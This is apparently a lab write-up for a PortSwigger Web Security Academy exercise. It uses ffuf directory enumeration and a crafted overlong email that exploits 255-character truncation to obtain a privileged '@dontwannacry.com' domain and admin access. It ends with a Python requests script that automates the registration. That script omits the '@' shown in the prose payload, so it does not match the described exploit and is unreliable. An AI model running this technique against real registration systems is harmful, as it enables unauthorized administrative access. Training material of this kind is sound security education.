Inconsistent handling of exceptional input

This lab doesn't adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.

I initially navigated directly to the '/register' page to observe how it processes my input. Notably, there's a note specifying that individuals affiliated with DontWannaCry should utilize their '@dontwannacry.com' email addresses. I've decided to set this information aside for potential future use.

register

I'll be running some enumeration in the background to ensure comprehensive coverage. If I encounter any obstacles, I can then explore alternative approaches.

➜  ~ ffuf -k -u https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

admin                   [Status: 401, Size: 5809, Words: 1885, Lines: 86, Duration: 43ms]

Upon initiation, I promptly identified an 'admin' directory. Without hesitation, I decided to explore its contents:

/admin

I took note that to access the admin interface, logging in as a DontWannaCry user is required.

In an attempt to exploit potential vulnerabilities, I experimented with user registration. One intriguing behavior emerged when I provided an excessively long string at the email parameter, surpassing the typical 255-character limit. After confirming the registration in the email client 'attacker@exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net' and logging in with the new user, I observed that the email had been truncated to precisely 255 characters.

Recalling the necessity to log in as a DontWannaCry user with the domain '@dontwannacry.com,' I conceived an idea: crafting an email string in a manner that, even after truncation, it would retain '@dontwannacry.com' as the domain.

so my new email will something like this:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net

After confirming the registration through the email client, I successfully logged in and gained access to the admin panel. Subsequently, I proceeded to delete the 'carlos' user, successfully resolving the lab.

Here I wrote a simple python script to register with the crafted email:

import requests

url = "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net:443/register"
cookies = {"session": "QcfYeIhElK2zKXRJVod0WoqKCe771Fyu"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net", "Referer": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net/register", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}

buff=255-len("dontwannacry.com")
mail="a"*buff+"dontwannacry.com"+".exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net"
data = {"csrf": "7vRFv3AwJWXgH6JNp5pNwkOCCKUxfBQj", "username": "ichyaboy", "email": mail, "password": "password"}

requests.post(url, headers=headers, cookies=cookies, data=data)

Last updated